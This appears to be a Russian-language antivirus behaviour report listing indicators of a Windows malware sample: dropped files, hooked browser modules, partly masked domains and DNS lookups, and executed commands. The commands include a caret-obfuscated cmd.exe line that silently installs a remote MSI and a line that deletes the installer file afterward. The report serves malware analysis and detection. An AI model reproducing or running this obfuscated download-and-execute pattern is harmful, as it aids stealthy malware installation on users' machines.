Техническая информация
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/klo009821.msi /qn
- %WINDIR%\explorer.exe
- firefox.exe
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
- %WINDIR%\syswow64\autofmt.exe
- %WINDIR%\syswow64\autochk.exe
- %BOOT_VOL%\boot\bcd.log
- %BOOT_VOL%\boot\bcd
- %TEMP%\nsi36d9.tmp
- %TEMP%\12let2fiul
- %TEMP%\tczbv596pxuq5qz
- %TEMP%\nss3718.tmp\egqunmsyws.dll
- %WINDIR%\installer\msi363f.tmp
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat.log1
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat
- 'fa###finn.com':80
- 'ar####iklounge.com':80
- 'su##.com':80
- DNS ASK fa###finn.com
- DNS ASK fb####sbvsjbvjs.com
- DNS ASK ar####iklounge.com
- DNS ASK ti####endstique.com
- DNS ASK su##.com
- DNS ASK pr#####partner-ag.com
- '%WINDIR%\installer\msi363f.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/klo009821.msi /qn' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i http://fa###finn.com/admin/klo009821.msi /qn
- '%WINDIR%\syswow64\control.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSI363F.tmp"